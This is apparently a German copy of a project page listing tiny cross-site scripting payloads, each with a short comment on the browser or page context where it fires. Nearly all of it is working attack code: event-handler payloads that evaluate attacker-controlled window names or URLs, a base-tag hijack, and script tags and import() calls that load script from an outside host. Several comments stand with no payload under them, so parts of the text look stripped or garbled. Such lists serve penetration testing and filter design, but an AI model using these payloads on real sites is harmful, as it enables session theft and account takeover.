
Eine Sammlung winziger XSS-Payloads, die in verschiedenen Kontexten verwendet werden können. https://tinyxss.terjanq.me
Eine Sammlung kurzer XSS-Payloads, die in verschiedenen Kontexten verwendet werden können.
Die Demo ist hier verfügbar: https://tinyxss.terjanq.me
<!-- Erfordert ein relatives Skript, das nach der Senke in das DOM eingefügt wird, z. B. <base/href=//NJ.₨> ... <script src=/aaa></script> -->
<base/href=//NJ.₨>
<!-- Funktioniert nur als reflected XSS -->
<svg/onload=eval(name)>
<!-- Wenn du die URL kontrollierst -->
<svg/onload=eval(`'`+URL)>
<!-- Wenn du den Namen kontrollierst, aber unsafe-eval nicht aktiviert ist -->
<svg/onload=location=name>
<!-- In Chrome funktioniert es auch innerhalb von innerHTML, sogar bei Elementen, die noch nicht in das DOM eingefügt wurden -->
<svg><svg/onload=eval(name)>
<!-- Wenn du den Namen des Fensters kontrollierst, funktioniert dieser Payload innerhalb von innerHTML, sogar bei Elementen, die noch nicht in das DOM eingefügt wurden -->
<audio/src/onerror=eval(name)>
<!-- Wenn du die URL kontrollierst, funktioniert dieser Payload innerhalb von innerHTML, sogar bei Elementen, die noch nicht in das DOM eingefügt wurden -->
<!-- Nur ein einfaches Skript -->
<script/src=//NJ.₨></script>
<!-- Wenn du den Namen des Fensters kontrollierst -->
<!-- Wenn du die URL kontrollierst -->
<!-- Wenn die Anzahl der iframes auf der Seite konstant ist -->
<!-- nur für Firefox -->
<script/href=//NJ.₨ />">
<!-- Wenn die Anzahl der iframes auf der Seite zufällig ist -->
<!-- Wenn unsafe-inline in CSP deaktiviert ist und externe Skripte erlaubt sind -->
</script>">
<!-- Wenn Inline-Styles erlaubt sind -->
<style/onload=eval(name)>
<!-- Wenn Inline-Styles erlaubt sind und die URL kontrolliert werden kann -->
<style/onload=eval(`'`+URL)>
<!-- Wenn Inline-Styles blockiert sind -->
<style/onerror=eval(name)>
<!-- Verwendet externes Skript als Import, funktioniert nicht in innerHTML -->
<!-- Der PoC funktioniert nur auf https und Chrome, da NJ.₨ den Sec-Fetch-Dest-Header überprüft -->
<svg/onload=import(/\\NJ.₨/)>
<!-- Verwendet externes Skript als Import, wird ausgelöst, wenn Inline-Styles erlaubt sind.
<!-- Der PoC funktioniert nur auf https und Chrome, da NJ.₨ den Sec-Fetch-Dest-Header überprüft -->
<style/onload=import(/\\NJ.₨/)>
<!-- Verwendet externes Skript als Import -->
<!-- Der PoC funktioniert nur auf https und Chrome, da NJ.₨ den Sec-Fetch-Dest-Header überprüft -->
Veraltet:
<!-- Wenn du die URL kontrollierst, nur Safari -->
<!-- Wenn Inline-Styles erlaubt sind, nur Safari -->
<style/onload=write(URL)>